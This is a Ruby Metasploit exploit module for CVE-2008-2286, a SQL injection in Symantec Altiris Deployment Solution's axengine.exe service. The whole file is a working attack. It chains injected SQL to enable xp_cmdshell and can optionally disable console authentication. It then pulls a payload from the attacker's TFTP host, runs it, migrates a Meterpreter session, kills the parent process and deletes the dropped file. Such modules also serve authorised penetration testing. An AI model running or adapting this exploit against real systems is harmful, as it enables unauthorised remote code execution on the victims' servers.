1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::CmdStager
10
  include Msf::Exploit::Remote::Tcp
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Symantec Altiris DS SQL Injection',
17
        'Description' => %q{
18
          This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
19
          to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
20
          numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
21
          several SQL injections are required in close succession, first to enable xp_cmdshell, then
22
          retrieve the payload via TFTP and finally execute it. The module also has the capability
23
          to disable or enable local application authentication. In order to work the target system
24
          must have a tftp client available.
25
        },
26
        'Author' => [
27
          'Brett Moore', # Vulnerability discovery
28
          '3v0lver' # Metasploit module
29
        ],
30
        'License' => MSF_LICENSE,
31
        'References' => [
32
          [ 'CVE', '2008-2286' ],
33
          [ 'OSVDB', '45313' ],
34
          [ 'BID', '29198'],
35
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
36
        ],
37
        'DefaultOptions' => {
38
          'EXITFUNC' => 'process',
39
        },
40
        'Targets' => [
41
          [
42
            'Windows 2003 (with tftp client available)',
43
            {
44
              'Arch' => ARCH_X86,
45
              'Platform' => 'win'
46
            }
47
          ]
48
        ],
49
        'Privileged' => true,
50
        'Platform' => 'win',
51
        'DisclosureDate' => '2008-05-15',
52
        'DefaultTarget' => 0,
53
        'Compat' => {
54
          'Meterpreter' => {
55
            'Commands' => %w[
56
              stdapi_fs_delete_file
57
              stdapi_sys_config_getenv
58
              stdapi_sys_process_attach
59
              stdapi_sys_process_get_processes
60
              stdapi_sys_process_kill
61
            ]
62
          }
63
        },
64
        'Notes' => {
65
          'Reliability' => UNKNOWN_RELIABILITY,
66
          'Stability' => UNKNOWN_STABILITY,
67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
68
        }
69
      )
70
     )
71

72
    register_options(
73
      [
74
        Opt::RPORT(402),
75
        OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),
76
        OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
77
        OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
78
      ]
79
    )
80
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
81

82
    self.needs_cleanup = true
83
  end
84

85
  def execute_command(cmd, opts = {})
86
    inject = []
87

88
    if @xp_shell_enable
89
      inject += [
90
        "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure", '')}",
91
        "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure", '')}",
92
      ]
93
      @xp_shell_enable = false
94
    end
95

96
    if @wc_disable_security
97
      inject += ["#{Rex::Text.to_hex("wc_upd_disable_security", '')}"]
98
      @wc_disable_security = false
99
    end
100

101
    if @wc_enable_security
102
      inject += ["#{Rex::Text.to_hex("wc_upd_enable_security", '')}"]
103
      @wc_enable_security = false
104
    end
105

106
    inject += ["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'", '')}"] if cmd != nil
107

108
    inject.each do |sqli|
109
      send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
110
    end
111
  end
112

113
  def send_update_computer(processor_speed)
114
    notification = %Q|Request=UpdateComputer
115
OS-Bit=32
116
CPU-Arch=x86
117
IP-Address=192.168.20.107
118
MAC-Address=005056C000AB
119
Name=Remove_test
120
OS=Windows XP
121
Version=2.6-38 (32-Bit)
122
LoggedIn=Yes
123
Boot-Env=Automation
124
Platform=Linux
125
Agent-Settings=Same
126
Sys-Info-TimeZoneBias=0
127
Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
128
Processor-Speed=#{processor_speed}
129
   \x00
130
   |
131

132
    connect
133
    sock.put(notification)
134
    response = sock.get_once()
135
    disconnect
136

137
    return response
138
  end
139

140
  def check
141
    res = send_update_computer("2659")
142

143
    unless res and res =~ /Result=Success/ and res =~ /DSVersion=(.*)/
144
      return Exploit::CheckCode::Unknown
145
    end
146

147
    version = $1
148

149
    unless version =~ /^6\.(\d+)\.(\d+)$/
150
      return Exploit::CheckCode::Safe
151
    end
152

153
    vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"
154

155
    minor = $1.to_i
156
    build = $2.to_i
157

158
    if minor == 8
159
      if build == 206 || build == 282 || build == 378
160
        return Exploit::CheckCode::Appears
161
      elsif build < 390
162
        return Exploit::CheckCode::Appears
163
      end
164
    elsif minor == 9 and build < 176
165
      # The existence of versions matching this profile is a possibility... none were observed in the wild though
166
      # as such, we're basing confidence off of Symantec's vulnerability bulletin.
167
      return Exploit::CheckCode::Appears
168
    end
169

170
    return Exploit::CheckCode::Safe
171
  end
172

173
  def exploit
174
    @wc_disable_security = datastore['DISABLE_SECURITY']
175
    @wc_enable_security = datastore['ENABLE_SECURITY']
176
    @xp_shell_enable = datastore['XP_CMDSHELL']
177

178
    # CmdStagerVBS was tested here as well, however delivery took roughly
179
    # 30 minutes and required sending almost 350 notification messages.
180
    # size constraint requirement for SQLi is: linemax => 393
181
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
182
    execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
183
  end
184

185
  def on_new_session(client)
186
    return if not stager_instance.payload_exe
187

188
    # can't scrub dropped payload while the process is still active so...
189
    # iterate through process list, find our process and the associated
190
    # parent process ID, Kill the parent.
191
    # This module doesn't use FileDropper because of timing issues when
192
    # using migrate -f and FileDropper. On the other hand PrependMigrate
193
    # has been avoided because of older issues with reverse_https payload
194

195
    unless client.type == "meterpreter"
196
      print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually")
197
      return
198
    end
199

200
    client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")
201
    # migrate
202
    print_status("Migrating ...")
203
    client.console.run_single("run migrate -f")
204
    # kill the parent process so the payload can hopefully be dropped
205
    print_status("Kill parent process ...")
206
    client.sys.process.get_processes().each do |proc|
207
      if proc['pid'] == client.sys.process.open.pid
208
        client.sys.process.kill(proc['ppid'])
209
      end
210
    end
211

212
    win_temp = client.sys.config.getenv('TEMP')
213
    win_file = "#{win_temp}\\#{stager_instance.payload_exe}"
214
    print_status("Attempting to delete #{win_file} ...")
215
    client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
216
    client.fs.file.rm(win_file)
217
    print_good("Deleted #{win_file}")
218
  end
219
end
220

221